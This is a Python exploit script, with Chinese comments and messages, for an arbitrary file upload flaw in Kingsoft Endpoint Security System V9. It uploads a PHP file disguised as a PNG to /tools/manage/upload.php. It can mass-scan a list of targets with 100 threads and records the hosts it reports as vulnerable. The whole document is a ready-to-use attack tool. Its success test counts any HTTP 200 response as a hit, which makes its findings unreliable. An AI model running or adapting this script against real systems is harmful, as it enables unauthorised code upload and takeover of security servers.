# 金山终端安全系统V9任意文件上传漏洞
import requests,sys,argparse
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    test="""    __                   _                   
   /  |                 | |               |  
   \_/|              _  | |  __   __,   __|  
 |  |_|-----|   |  |/ \_|/  /  \_/  |  /  |  
  \/  |      \_/|_/|__/ |__/\__/ \_/|_/\_/|_/
                  /|                         
                  \|                         

"""

    print(test)



def main():
    banner()
    parser=argparse.ArgumentParser(description='金山终端安全系统V9任意文件上传漏洞')
    parser.add_argument('-u','--url',dest='url',type=str,help='input the url')
    parser.add_argument('-f','--file',dest='file',type=str,help='input the file')
    args=parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list=[]
        with open(args.file,'r',encoding='utf-8')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp=Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")



def poc(target):
    url_payload= '/tools/manage/upload.php'
    headers={
        'User-Agent':'Mozilla/5.0',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'multipart/form-data; boundary=---------------------------332985667634852910053507734731',
        'Upgrade-Insecure-Requests': '1',
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache',
    }
    data="""
        -----------------------------332985667634852910053507734731
        Content-Disposition: form-data; name="file";filename="11111111111111111111111111111111.php"
        Content-Type: image/png
        <?php phpinfo();?>
        -----------------------------332985667634852910053507734731--
        """


    try:
        res1=requests.post(url=target+url_payload,headers=headers,data=data,timeout=10)
        if res1.status_code==200:
            print( f"[+]{target} 存在漏洞！")
            with open('result.txt','a',encoding='utf-8')as fp:
                fp.write(target+'\n')
                return True
        else:
            print('[-] 不存在漏洞')
            return False
    except:
        print('目标网站存在问题，无法访问')



if __name__ =='__main__':
    main()
